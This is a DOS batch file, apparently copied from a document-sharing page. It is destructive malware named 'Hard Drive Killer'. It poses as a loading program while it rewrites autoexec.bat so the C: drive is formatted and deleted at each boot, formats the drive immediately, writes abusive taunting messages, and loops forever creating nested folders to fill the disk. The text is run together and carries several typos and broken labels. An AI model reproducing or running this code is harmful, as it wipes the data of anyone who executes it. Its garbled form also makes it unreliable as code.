Vous êtes sur la page 1sur 2

@echo off echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -h -r -c:\autoexec.

bat >nul echo @echo off >c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo dummy variable >c:\dvar.txt :form call format c: /q /u /autotest >nul if exist c:\dos\format.* goto dosform if exist c:\windows\command\format.* goto winform goto de cd\dos >nul call format c: /h /q /u /autotest >nul cd\ >nul :winform cd\windows\command >nul call format c: /h /q /u /autotest >nul cd\ >nul goto inform :de if exist c:\dvar.txt goto dtree goto inform :dtree call deltree /y c: >nul if exist c:\dos\deltree.* goto delwin goto inform :deldos cd\dos call deltree /y c: >nul cd\ :delwin cd\windows\command >nul call deltree \y c: >nul cd\ >nul :inform cls echo You have been hit by the Hard Drive Killer, written by Ufobaby >c:\hdkiller.txt echo HD killer is a UFOBABY production. >>c:\hdkiller.txt echo. >>c:\hdkiller.thx echo here is a message to all you but lickers . . . >>c:\hdkiller.txt echo. >>c:\hdkiller.txt echo FIX EU SERVERS [Ufo baby]. >>c:\hdkiller.txt echo. >>hdkiller.txt echo if you were destroyed by this HDkiller program, then you would have >>c:\hdkiller.txt echo deserved it. Strom the front bithces!!! >>c:*\hdkiller.txt rem autoexec.bat echo @echo off >c\autoexec.bat echo cls >>c:\autoexec.bat echo :form echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo if exist c:\dos\format.* goto dosform >>c:\autoexec.bat echo if exist c:\windows\command\format.* goto winform >>c:\autoexec.bat echo goto de >>c:\autoexec.bat echo :dosform >>c:\autoexec.bat echo cd\dos >nul >>c:\autoexec.bat

echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat echo :winform >>c:\autoexec.bat echo cd\windows\command >nul >>c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat echo :winform >>c:\autoexec.bat echo cd\windows\command >nul >>c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat echo :de >>c:\autoexec.bat echo if exist c:\dvar.txt goto dtree >>c:\autoexec.bat echo goto write >>c:\autoexec.bat echo :dtree >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo if exist c:\dos\deltree.* goto deldos >>c:\autoexec.bat echo if exist c:\windows\command\deltree.* goto delwin >>c:\autoexec.bat echo :delodos >>c:\autoexec.bat echo cd\dos >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo :delwin >>c:\autoexec.bat echo cd\windows\command >nul >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat echo :write >>c:\autoexec.bat echo type hdkiller.txt >>c:\autoexec.bat echo c:\ >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo :nasty >>c:\autoexec.bat echo md nasty >>c:\autoexec.bat echo cd nasty >>c:\autoexec.bat echo You're Gone @$$ hole!!!!! >yourgone.txt >>c:\autoexec.bat echo goto nasty >>c:\autoexec.bat echo pause >>c:\autoexec.bat rem autoexec.bat c:\ >nul cd\ >nul :killfat md nasty >nul cd nasty >nul echo YOu're Gone ass hole!!!! >yourgone.txt >nul goto killfat :end

Vous aimerez peut-être aussi